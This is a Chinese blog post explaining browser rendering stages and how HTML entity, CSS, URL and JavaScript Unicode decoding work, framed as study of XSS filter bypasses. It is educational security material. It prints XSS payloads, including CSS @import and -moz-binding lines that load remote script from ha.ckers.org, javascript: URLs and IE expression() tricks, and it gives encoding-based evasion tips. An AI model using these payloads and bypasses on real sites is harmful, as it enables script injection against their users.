<!DOCTYPE html>
<html lang=zh>
<head><meta name="generator" content="Hexo 3.9.0">
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="description" content="— 被怼番之后，好好学习基础原理 —">
<meta name="keywords" content="前端,浏览器,xss">
<meta property="og:type" content="article">
<meta property="og:title" content="浏览器渲染原理与编码解码">
<meta property="og:url" content="http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/index.html">
<meta property="og:site_name" content="啦啦菌NODE">
<meta property="og:description" content="— 被怼番之后，好好学习基础原理 —">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006iKNp3gy1fult61719nj30hc081754.jpg">
<meta property="og:image" content="http://ww3.sinaimg.cn/large/006iKNp3gy1fult6vvff2j30jg06baae.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006iKNp3gy1fult5nzvy2j30v70ha0ti.jpg">
<meta property="og:image" content="http://ww2.sinaimg.cn/large/006iKNp3gy1fult5wio0vj30t70e3dld.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006iKNp3gy1fult6fs4oij30vy0exjuc.jpg">
<meta property="og:image" content="http://ww4.sinaimg.cn/large/006iKNp3gy1fult724cztj309n04wwe9.jpg">
<meta property="og:image" content="http://ww3.sinaimg.cn/large/006iKNp3gy1fult6ov33uj30fx03p0sn.jpg">
<meta property="og:image" content="http://ww2.sinaimg.cn/large/006iKNp3gy1fult7jzx45j30da03hglf.jpg">
<meta property="og:image" content="http://ww3.sinaimg.cn/large/006iKNp3gy1fult7qap6nj309900zwe9.jpg">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/006iKNp3gy1fult7thytpj30l204xdfr.jpg">
<meta property="og:image" content="http://ww4.sinaimg.cn/large/006iKNp3gy1fult7852h9j30et03x3yd.jpg">
<meta property="og:updated_time" content="2019-04-07T03:50:19.594Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="浏览器渲染原理与编码解码">
<meta name="twitter:description" content="— 被怼番之后，好好学习基础原理 —">
<meta name="twitter:image" content="http://ww1.sinaimg.cn/large/006iKNp3gy1fult61719nj30hc081754.jpg">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>浏览器渲染原理与编码解码</title>
    <!-- styles -->
    <link rel="stylesheet" href="/css/style.css">
    <!-- persian styles -->
    
      <link rel="stylesheet" href="/css/rtl.css">
    
    <!-- rss -->
    
    
</head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/search/">搜索</a></li>
         
          <li><a href="/about/">关于</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/friends/">友链</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2018/08/29/智能合约安全-重入攻击/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/2018/08/15/NEO-搭建私有链/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&text=浏览器渲染原理与编码解码"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&is_video=false&description=浏览器渲染原理与编码解码"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=浏览器渲染原理与编码解码&body=Check out this article: http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&title=浏览器渲染原理与编码解码"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://lalajun.com/2018/08/25/浏览器渲染原理与编码解码/&name=浏览器渲染原理与编码解码&description=&lt;p&gt;— 被怼番之后，好好学习基础原理 —&lt;/p&gt;"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#编码方便回顾小节"><span class="toc-number">2.</span> <span class="toc-text">编码方便回顾小节</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#浏览器渲染过程"><span class="toc-number">3.</span> <span class="toc-text">浏览器渲染过程</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#HTML-gt-DOM树"><span class="toc-number">3.1.</span> <span class="toc-text">HTML -&gt; DOM树</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#css"><span class="toc-number">3.1.1.</span> <span class="toc-text">css</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#js"><span class="toc-number">3.1.2.</span> <span class="toc-text">js</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSS-gt-CSSOM树"><span class="toc-number">3.2.</span> <span class="toc-text">CSS -&gt; CSSOM树</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSSOM-DOM-gt-render树"><span class="toc-number">3.3.</span> <span class="toc-text">CSSOM + DOM -&gt; render树</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#布局-loyout-reflow"><span class="toc-number">3.4.</span> <span class="toc-text">布局 loyout/reflow</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#全局、增量"><span class="toc-number">3.4.1.</span> <span class="toc-text">全局、增量</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#绘制-Painting"><span class="toc-number">3.5.</span> <span class="toc-text">绘制 Painting</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#渲染过程的解码过程"><span class="toc-number">4.</span> <span class="toc-text">渲染过程的解码过程</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#HTML实体编码"><span class="toc-number">4.1.</span> <span class="toc-text">HTML实体编码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#CSS编码"><span class="toc-number">4.2.</span> <span class="toc-text">CSS编码</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#URL解析"><span class="toc-number">4.3.</span> <span class="toc-text">URL解析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#unicode编码-javascript解析器"><span class="toc-number">4.4.</span> <span class="toc-text">unicode编码 javascript解析器</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#判断解析流程-url"><span class="toc-number">4.5.</span> <span class="toc-text">判断解析流程 url</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#判断解析流程-DOM"><span class="toc-number">4.6.</span> <span class="toc-text">判断解析流程 DOM</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#自测"><span class="toc-number">5.</span> <span class="toc-text">自测</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#小结"><span class="toc-number">6.</span> <span class="toc-text">小结</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考"><span class="toc-number">7.</span> <span class="toc-text">参考</span></a></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        浏览器渲染原理与编码解码
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">啦啦菌NODE</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2018-08-25T09:05:28.000Z" itemprop="datePublished">2018-08-25</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/xss/">xss</a>, <a class="tag-link" href="/tags/前端/">前端</a>, <a class="tag-link" href="/tags/浏览器/">浏览器</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <p>— 被怼番之后，好好学习基础原理 —</p>
<a id="more"></a>
<hr>

<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>突然被电话面试了一波，在XSS这里被怼番了…是真滴菜还一直没有补，哎，潜心研究一下。</p>
<p>其中有问到浏览器渲染的原理，可以说是没有了解了。可能平常会使用到更相近的是在想办法过滤的时候，需要了解的渲染中URL,HTML,JS编码解码过程。</p>
<p>这两块内容有着千丝万缕，放在一起学习，记录。</p>
<hr>

<h1 id="编码方便回顾小节"><a href="#编码方便回顾小节" class="headerlink" title="编码方便回顾小节"></a>编码方便回顾小节</h1><p>HTMl编码不能对标签（包括标签头 以及其中的属性，结构等），但是可以编码标签之间的内容，以及标签属性””之间的所有内容。可以编码javascript，可以编码alert，可以编码:等符号<br>URL编码不能对伪协议类型进行任何的编码操作：javascript:<br>js编码可以编码alert等标识符，不能编码控制字符<code>(</code>,<code>)</code>,<code>;</code>,<code>&quot;</code>,<code>&#39;</code>等</p>
<h1 id="浏览器渲染过程"><a href="#浏览器渲染过程" class="headerlink" title="浏览器渲染过程"></a>浏览器渲染过程</h1><p>看一个我觉得易于理解的webkit渲染主要流程：</p>
<p><img src="http://ww1.sinaimg.cn/large/006iKNp3gy1fult61719nj30hc081754.jpg" alt="s3.png"></p>
<p>加上js的作用如下：<br><img src="http://ww3.sinaimg.cn/large/006iKNp3gy1fult6vvff2j30jg06baae.jpg" alt="s6.jpg"></p>
<p><strong>名词解释：</strong></p>
<ul>
<li><strong>DOM Tree</strong>：浏览器将HTML解析成树形的数据结构</li>
<li><strong>CSS Rule Tree(CSSOM)</strong>：浏览器将CSS解析成树形的数据结构。</li>
<li><strong>Render Tree</strong>：DOM和CSSOM合并后生成Render Tree（渲染树）。渲染树用来计算可见元素的布局并且作为将像素渲染到屏幕上的过程的输入。</li>
<li><strong>layout</strong>：Webkit中元素的定位称为布局</li>
<li><strong>reflow</strong>：Gecko中称为回流，重新渲染，第一次渲染也叫这个</li>
<li><strong>repaint</strong>：重绘，不改变布局改变样式时重绘。比reflow快</li>
</ul>
<ul>
<li><strong>DOMContentLoaded</strong>：仅当DOM加载完成，不包括样式表，图片，flash，触发 DOMContentLoaded 事件</li>
<li><strong>onload事件</strong>：当页面上所有的DOM，样式表，脚本，图片，flash都已经加载完成了， 触发 onload 事件。</li>
</ul>
<ul>
<li><strong>首屏时间</strong>：当浏览器显示第一屏页面所消耗的时间，在国内的网络条件下，通常一个网站，如果“首屏时间”在2秒以内是比较优秀的，5秒以内用户可以接受，10秒以上就不可容忍了。</li>
<li><strong>白屏时间</strong>：指浏览器开始显示内容的时间。</li>
</ul>
<p>首先知道，以上的步骤不是严格一步步完成的。<br>渲染引擎会力求尽快将内容显示在屏幕上。它不必等到整个 HTML 文档解析完毕之后，就会开始构建render树和设置布局。在不断接收和处理来自网络的其余内容的同时，渲染引擎会将部分内容解析并显示出来。</p>
<p>以下来慢慢说几个重要的细节</p>
<h2 id="HTML-gt-DOM树"><a href="#HTML-gt-DOM树" class="headerlink" title="HTML -&gt; DOM树"></a>HTML -&gt; DOM树</h2><p><code>HTML解析器</code> 负责 HTML 变为 DOM树 的构建,地址可以分为<strong>标记化</strong>和<strong>树构建</strong>两个阶段</p>
<p>具体步骤如下：</p>
<ul>
<li>字节转化为字符</li>
<li>确定特定字符 tokens</li>
<li>将tokens 转化为 节点</li>
<li>以 Document 为根节点构建DOM树</li>
</ul>
<p><img src="http://ww1.sinaimg.cn/large/006iKNp3gy1fult5nzvy2j30v70ha0ti.jpg" alt="s1.png"></p>
<blockquote>
<p>DOM 树的构建过程是一个深度遍历过程：当前节点的所有子节点都构建好后才会去构建当前节点的下一个兄弟节点。 </p>
</blockquote>
<h3 id="css"><a href="#css" class="headerlink" title="css"></a>css</h3><p>在html文档的 head 中遇到了一个 link 标记，该标记引用一个外部css，浏览器会立即发出对该资源的请求</p>
<blockquote>
<p>由于 HTML解析构建和CSS的解析是相互独立的并不会造成冲突，因此我们通常将css样式放在head中，让浏览器尽早解析css。</p>
</blockquote>
<h3 id="js"><a href="#js" class="headerlink" title="js"></a>js</h3><p>在html文档中 html解析器遇到一个script标记，他会阻塞DOM树的构建，开始下载js，然后将控制权移交给JavaScript引擎解析，执行。等 JavaScript 引擎运行完毕，浏览器会从中断的地方恢复 DOM 构建。</p>
<blockquote>
<p>因为js是可能会改变html现有结构，浏览器会在js执行后决定当前文档是否需要进行重新渲染或者重排，所以会堵塞。因此，js引用放在前面会推迟页面首绘时间。</p>
</blockquote>
<h2 id="CSS-gt-CSSOM树"><a href="#CSS-gt-CSSOM树" class="headerlink" title="CSS -&gt; CSSOM树"></a>CSS -&gt; CSSOM树</h2><p><strong>CSS解释器</strong>为页面上任何对象计算样式时，浏览器都会从适用于该节点的最通用规则开始（body元素子项，应用虽有body样式），然后规则“向下级联”，以递归的方式优化计算样式。</p>
<p>构建过程与html相似：</p>
<ul>
<li>字符 确定特定字符 tokens</li>
<li>将tokens 转化为 节点</li>
<li>构建cssom树</li>
</ul>
<p><img src="http://ww2.sinaimg.cn/large/006iKNp3gy1fult5wio0vj30t70e3dld.jpg" alt="s2.png"></p>
<blockquote>
<p>css解析过程，自右向左逆向解析。「div div p em」先匹配 em 开始。这样速度快<br>所以css层数嵌套越多，越慢</p>
</blockquote>
<h2 id="CSSOM-DOM-gt-render树"><a href="#CSSOM-DOM-gt-render树" class="headerlink" title="CSSOM + DOM -&gt; render树"></a>CSSOM + DOM -&gt; render树</h2><p>DOM 树与 CSSOM树 合并后形成 <strong>render（渲染）树</strong>。有了Render Tree，浏览器已经能知道网页中有哪些节点、各个节点的CSS定义以及他们的从属关系。</p>
<p><strong>生成过程</strong>：<br>遍历每个DOM树中的node节点，在CSSOM规则树中寻找当前节点的样式，生成渲染树。</p>
<p><img src="http://ww1.sinaimg.cn/large/006iKNp3gy1fult6fs4oij30vy0exjuc.jpg" alt="s4.png"></p>
<p>注意。不可见的DOM元素不会被插入渲染树。（head元素，disply值为none的隐藏DOM元素 不在渲染树中出现，visibility属性为hidden 的元素将出现在渲染树中）</p>
<h2 id="布局-loyout-reflow"><a href="#布局-loyout-reflow" class="headerlink" title="布局 loyout/reflow"></a>布局 loyout/reflow</h2><p>当渲染对象被创建并添加到树中，它们并没有位置和大小，计算这些值的过程称为<strong>layout</strong>或<strong>reflow</strong>。</p>
<p>Html使用基于流的布局模型，意味着大部分时间，可以以单一的途径进行几何计算。流中靠后的元素并不会影响前面元素的几何特性，所以布局可以在文档中从右向左、自上而下的进行。也存在一些例外，比如html tables。</p>
<p>布局是一个递归的过程，由根渲染对象开始，它对应html文档元素，布局继续递归的通过一些或所有的frame层级，为每个需要几何信息的渲染对象进行计算。</p>
<p>当 render tree 发生变化时则会重新layout、reflow</p>
<h3 id="全局、增量"><a href="#全局、增量" class="headerlink" title="全局、增量"></a>全局、增量</h3><p>layout、reflow也有不同的方式。<br>当layout在整棵渲染树触发时，称为<strong>全局layout</strong>。包括全局样式的改变，窗口resize等，窗口resize会马上进行reflow</p>
<p>有些操作浏览器并不会立刻reflow 或 repaint 一次，而是会把这样的操作积攒一批，然后做一次 reflow，这又叫异步 reflow 或增量异步 reflow</p>
<h2 id="绘制-Painting"><a href="#绘制-Painting" class="headerlink" title="绘制 Painting"></a>绘制 Painting</h2><p>绘制阶段，遍历渲染树并调用渲染对象的paint方法将它们的内容显示在屏幕上，绘制使用UI基础组件。</p>
<p>也分为全局绘制，与增量绘制一块矩形区域。<br>除此之外绘制还有特定的顺序，此处不多说。</p>
<hr>

<h1 id="渲染过程的解码过程"><a href="#渲染过程的解码过程" class="headerlink" title="渲染过程的解码过程"></a>渲染过程的解码过程</h1><h2 id="HTML实体编码"><a href="#HTML实体编码" class="headerlink" title="HTML实体编码"></a>HTML实体编码</h2><p>给出一些常见的HTML实体编码，详细<a href="http://www.w3school.com.cn/tags/html_ref_ascii.asp" target="_blank" rel="noopener">ASCII常用参考</a>  <a href="http://www.w3school.com.cn/tags/html_ref_entities.html" target="_blank" rel="noopener">ISO参考</a></p>
<table>
<thead>
<tr>
<th style="text-align:center">结果</th>
<th style="text-align:center">实体名称</th>
<th style="text-align:center">实体编码</th>
<th>16进制实体编码</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:center"><code>&quot;</code></td>
<td style="text-align:center"><code>&amp;quot;</code></td>
<td style="text-align:center"><code>&amp;#34;</code></td>
<td><code>&amp;#x22;</code></td>
</tr>
<tr>
<td style="text-align:center"><code>&#39;</code></td>
<td style="text-align:center"><code>&amp;apos;</code></td>
<td style="text-align:center"><code>&amp;#39;</code></td>
<td><code>&amp;#x27;</code></td>
</tr>
<tr>
<td style="text-align:center"><code>&amp;</code></td>
<td style="text-align:center"><code>&amp;amp;</code></td>
<td style="text-align:center"><code>&amp;#38;</code></td>
<td><code>&amp;#x26;</code></td>
</tr>
<tr>
<td style="text-align:center"><code>:</code></td>
<td style="text-align:center"></td>
<td style="text-align:center"><code>&amp;#58;</code></td>
<td><code>&amp;#x3A;</code></td>
</tr>
<tr>
<td style="text-align:center"><code>&lt;</code></td>
<td style="text-align:center"><code>&amp;lt;</code></td>
<td style="text-align:center"><code>&amp;#60;</code></td>
<td><code>&amp;#x3C;</code></td>
</tr>
<tr>
<td style="text-align:center"><code>=</code></td>
<td style="text-align:center"></td>
<td style="text-align:center"><code>&amp;#61;</code></td>
<td><code>&amp;#x3D;</code></td>
</tr>
<tr>
<td style="text-align:center"><code>&gt;</code></td>
<td style="text-align:center"><code>&amp;gt;</code></td>
<td style="text-align:center"><code>&amp;#62;</code></td>
<td><code>&amp;#x3E;</code></td>
</tr>
<tr>
<td style="text-align:center"><code>?</code></td>
<td style="text-align:center"></td>
<td style="text-align:center"><code>&amp;#63;</code></td>
<td><code>&amp;#x3F;</code></td>
</tr>
</tbody>
</table>
<p>浏览器最早开始解析HTML，将标签转化为内容树中的DOM 节点，此时识别标签的时候，HTML 解析器是无法识别那边被实体编码的内容的，即 HTML解析器 不会做解码的工作。</p>
<p>只有建立起DOM 树，才能对每个节点的内容进行识别，这时候如果出现实体编码，则会进行实体解码。<br>但是这时候解析出来假如有新的标签，那么不会在加入DOM树,只是作为字符串处理。比如<code>&lt;textarea&gt;</code>和<code>&lt;title&gt;</code></p>
<p>并且不是所有节点内容都会进行实体解码，比如<code>&lt;script&gt;</code>里面的代码</p>
<p>以上对于标签的识别，并不只是标签头本身，也包括其中的属性、结构等。</p>
<p>对于标签属性进行html编码<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- 源码 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>&amp;#<span class="attr">x3d</span>;"<span class="attr">123</span>"&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 渲染后右键源码 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>&amp;#<span class="attr">x3d</span>;"<span class="attr">123</span>"&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p><img src="http://ww4.sinaimg.cn/large/006iKNp3gy1fult724cztj309n04wwe9.jpg" alt="s7.png"><br><img src="http://ww3.sinaimg.cn/large/006iKNp3gy1fult6ov33uj30fx03p0sn.jpg" alt="s5.png"></p>
<p>点击后不会有跳转到<code>/123</code>页面，说明是不会解析的。标签本身也是同理。</p>
<p>对于标签内容进行html编码<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- 源码 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"&amp;#x31;&amp;#x32;&amp;#x33;"</span>&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- 渲染后右键源码  --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"&amp;#x31;&amp;#x32;&amp;#x33;"</span>&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p>虽然右键源码内容还是html编码的,但是实际可以跳转<br><img src="http://ww2.sinaimg.cn/large/006iKNp3gy1fult7jzx45j30da03hglf.jpg" alt="s9.png"></p>
<p><img src="http://ww3.sinaimg.cn/large/006iKNp3gy1fult7qap6nj309900zwe9.jpg" alt="s10.png"></p>
<p>可以换一种更清楚的方式来看结果。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"JavaScript:alert('&amp;#x3C;OK&amp;#x3E;')"</span>&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure></p>
<p><img src="http://ww1.sinaimg.cn/large/006iKNp3gy1fult7thytpj30l204xdfr.jpg" alt="s11.png"></p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">&lt;!-- 测试时发现上面两种情况，不用; 作为编码结束，也可以识别 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">a</span> <span class="attr">href</span>=<span class="string">"&amp;#x31&amp;#x32&amp;#x33"</span>&gt;</span>test<span class="tag">&lt;/<span class="name">a</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p><img src="http://ww4.sinaimg.cn/large/006iKNp3gy1fult7852h9j30et03x3yd.jpg" alt="s8.png"></p>
<p>虽然会有报错说明，但是也是可以识别的。</p>
<h2 id="CSS编码"><a href="#CSS编码" class="headerlink" title="CSS编码"></a>CSS编码</h2><p>由于CSS通过expression方法控制js，但是只有在IE浏览器中可以使用，但是也已经很早就废弃了，只做一些简单的了解。<br>除此之外还可以通过引入外部链接，文件，url地址来执行js脚本</p>
<p><strong>CSS 编码解析</strong>是用了一套不太正统的转义策略：<strong>用一个反斜杠，后边跟1~6位十六进制数字构成。</strong>，所以字母e 可以编码为 \65, \065,\000065。</p>
<p>而因为这样，后边就不能直接紧跟数字或字母，否则会被当成转义里的内容处理，所以CSS 选择了空格作为终止标识，在解码的时候，再将空格去除。</p>
<p>CSS还支持直接使用反斜杠对非十六进制字符进行转义的方式，就按紧跟着反斜杠后边的字符的字面意思进行解释，这种机制可用来转义引号和反斜杠本身，不过不能转义HTML 控制的字符，比如尖括号，那是因为HTML 解析器总是先于CSS 解析器。</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">STYLE</span>&gt;</span><span class="undefined">@import'http://ha.ckers.org/xss.css';</span><span class="tag">&lt;/<span class="name">STYLE</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="css"><span class="selector-tag">BODY</span>&#123;<span class="attribute">-moz-bingding</span>:<span class="built_in">url</span>(<span class="string">"http://ha.ckers.org/xssmoz.xml#xss"</span>)&#125;</span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">style</span>=<span class="string">"background-image: url(javascript:alert('xss'))"</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!-- IE低版本 --&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">style</span>=<span class="string">"color:expression(alert(1));"</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">div</span> <span class="attr">style</span>=<span class="string">"color:expression\028 alert \028 1 \029 \029;"</span>&gt;</span></span><br></pre></td></tr></table></figure>
<h2 id="URL解析"><a href="#URL解析" class="headerlink" title="URL解析"></a>URL解析</h2><p>我们都知道浏览器发送到服务器时，服务器会对url进行一次URL解析然后处理。</p>
<p>那么浏览器中也会进行对于URL的解析。<br>比如html中的<code>&lt;a&gt;</code>标签的<code>href</code>属性，url解析器会对href内部的内容进行一次url解析<br>js中的<code>window.open()</code>,url解析器会对括号内部的内容进行一次url解析</p>
<p>URL解析过程中的一个细节了，不能对伪协议类型进行任何的编码操作，否则URL解析器会认为它无类型。<br>这个协议类型的格式是<code>javascript:</code>不是只是<code>javascript</code></p>
<p>除此了<code>javascript:</code>伪协议可以执行js代码之外，还有IE下的<code>vbscript</code>,Mozilla下的<code>dataURL</code>(data:text/html;这里可以直接添加html的<code>&lt;script&gt;标签，会执行</code>)</p>
<h2 id="unicode编码-javascript解析器"><a href="#unicode编码-javascript解析器" class="headerlink" title="unicode编码 javascript解析器"></a>unicode编码 javascript解析器</h2><p>说明一些javascript解析器的入口：</p>
<ul>
<li><code>&lt;script&gt;</code>标签</li>
<li><code>onlick</code>等事件js的动作</li>
<li>url调用<code>javascript:</code>伪协议</li>
<li><code>css</code>调用引入文件，或url再间接引入javascript:</li>
<li><code>eval()</code>调用</li>
<li>定时器触发</li>
</ul>
<p><strong>Unicode转义序列</strong>：<code>&quot;\uXXXX&quot;</code>，表示一个字符，其中xxxx表示一个16进制数字，如 “&lt;” Unicode编码为 “\u003c”。</p>
<blockquote>
<p>js编码还有一种普通十六进制 \xAA</p>
</blockquote>
<p>Unicode转义序列出现的地方。从上下文来看，可以分为三个地方：字符串中，标识符名称中和控制字符中。</p>
<ul>
<li>字符串中：转义序列只会被解释为正规字符，而不是单引号，双引号或者换行符这些能够打破字符串上下文的字符。</li>
<li>标识符名称中：转义序列会被解码并解释为标识符名称的一部分，例如函数名，属性名等等。</li>
<li>控制字符中：转义序列将不会被解释成控制字符，而仅仅被解码并解析为标识符名称或者字符串常量。</li>
</ul>
<p>JavaScript解析时只有<strong>标识符名称</strong>不会被当做字符串，<strong>控制字符</strong>仅会被解析为标示符名称或者字符串</p>
<p>Javascript解析器工作的时候可以将<code>\u0061\u006c\u0065\u0072\u0074</code>进行js解码后为“alert”，而“alert”是一个有效的标识符名称，它是能被正常解析的。像圆括号、双引号、单引号等等这些控制字符，在进行JavaScript解析的时候仅会被解码为字符串文本或者上面讲的标识符名称，不能作为控制字符解析。</p>
<p>所以unicode解码后的字符串，不能截断语句，不能有控制语法的功能，只能作为字符串，或标识符。</p>
<p>即，在绕过时，能编码的部分，不能包括控制符号如<code>(</code>,<code>)</code>,<code>;</code>,<code>&quot;</code>,<code>&#39;</code>等。解码后只作为字符串，或标识符名称处理</p>
